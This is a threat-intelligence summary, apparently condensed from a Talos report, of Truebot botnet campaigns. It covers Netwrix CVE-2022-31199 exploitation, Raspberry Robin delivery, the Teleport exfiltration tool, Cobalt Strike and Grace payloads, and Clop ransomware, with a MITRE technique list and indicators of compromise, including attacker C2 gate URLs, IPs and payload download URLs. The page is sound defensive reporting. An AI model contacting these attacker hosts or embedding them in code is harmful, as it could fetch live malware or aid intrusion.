Threat Research

Breaking the silence – Recent Truebot activity

Securonix

Since August 2022, Truebot (Silence.Downloader) infections have surged, with two botnets observed: a globally distributed one (notably targeting Mexico, Brazil, and Pakistan) and a newer US-focused botnet impacting Windows servers and several education-sector organizations. The campaigns tie Netwrix Auditor CVE-2022-31199 exploitation, Raspberry Robin-delivered Truebot, and a custom data-exfiltration tool called Teleport to post-compromise activity that also involves Grace and Cobalt Strike payloads and Clop ransomware. #Truebot #SilenceGroup #TA505 #RaspberryRobin #Grace #Teleport #Clop

Keypoints

  • Two Truebot botnets identified: a global distribution with focus on Mexico, Brazil, and Pakistan, and a newer US-focused botnet targeting Windows servers (often internet-exposed) and some education-sector targets.
  • Netwrix Auditor vulnerability CVE-2022-31199 used as an entry vector, with only limited internet exposure likely limiting initial compromises.
  • Raspberry Robin emerged as a major delivery mechanism, enabling Truebot infections via USB and contributing to a large botnet footprint.
  • Post-compromise activity includes data exfiltration using a custom tool named Teleport, which encrypts traffic and collects targeted data (screenshot, computer name, local network name, AD trust relations).
  • Grace and Cobalt Strike payloads (including PowerShell-based delivery and a Grace packer) were dropped after Truebot compromise, suggesting TA505-related tooling.
  • Clop ransomware is used in a broader operation, with attackers leveraging Teleport-enabled data collection and scheduled tasks to encrypt large data volumes.
  • Defensive guidance highlights Cisco security products and general indicators of compromise to detect and block these campaigns.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of a vulnerability in Netwrix Auditor (CVE-2022-31199) that was made public in July 2022 by Bishop Fox. “”
  • [T1105] Ingress Tool Transfer – Truebot drops and transfers payloads during initial access/post-compromise exploitation. “”
  • [T1197] BITS Jobs – The attack leveraged BITS to download payloads (BITS-based download/execution). “”
  • [T1059.003] Windows Command Shell – Execution via Windows command shell observed in bitsadmin usage. “”
  • [T1021.001] SMB – Lateral movement via exposed Windows services, notably SMB. “”
  • [T1053] Scheduled Task – Creation of scheduled tasks to run Clop ransomware across many systems. “”
  • [T1082] System Information Discovery – Data collection includes system info (screenshot, computer name, local network name, AD trust relations). “”
  • [T1055] Process Injection – In-memory loading/execution of additional modules and shellcodes. “”
  • [T1486] Data Encrypted for Impact – Clop ransomware encrypts data as part of a double-extortion scenario. “”
  • [T1041] Exfiltration Over C2 Channel – Custom exfiltration (Teleport) sending data to attacker-controlled C2. “”

Indicators of Compromise

  • [Domain] Gate endpoints (C2) – nefosferta.com/gate.php, gbpooolfhbrb.com/gate.php
  • [IP] Network-facing endpoints – 185.55.243.110/gate.php, 88.214.27.100/gate.php
  • [Hash] Download/sample payloads – 092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875, dd94c2fc46a6670b4600cf439b35dc81a401b09d2c2372139afe7b754d1d24d4
  • [File] Truebot-related binaries – UAVRServer.exe, msruntime.dll
  • [URL] Download/loader URLs – http://179.60.150.34:80/download/file.ext, http://tddshht.com/chkds.dll
  • [Tool] Teleport (custom data-exfiltration tool), Grace (GraceLoader) and related payloads

Read more: https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint